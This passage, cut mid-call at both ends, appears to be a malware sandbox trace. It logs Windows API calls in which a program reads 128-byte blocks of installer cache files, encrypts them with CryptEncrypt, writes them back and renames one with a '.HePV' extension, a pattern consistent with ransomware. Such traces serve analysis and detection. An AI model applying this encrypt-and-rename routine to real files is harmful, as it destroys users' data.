lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.942] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.942] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.943] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.943] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.943] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.943] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.943] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.943] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.944] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.944] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.945] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.945] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.945] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.945] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.945] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.945] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.039] MoveFileW (lpExistingFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.HePV" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab.hepv")) returned 1 [0046.057] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0046.058] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0046.058] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.061] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.061] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.061] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.061] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.061] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.062] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.062] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.062] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.062] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.062] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.062] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.063] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.063] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.063] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.063] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.063] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.063] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.064] ReadFile (in: hFile=0xd4, 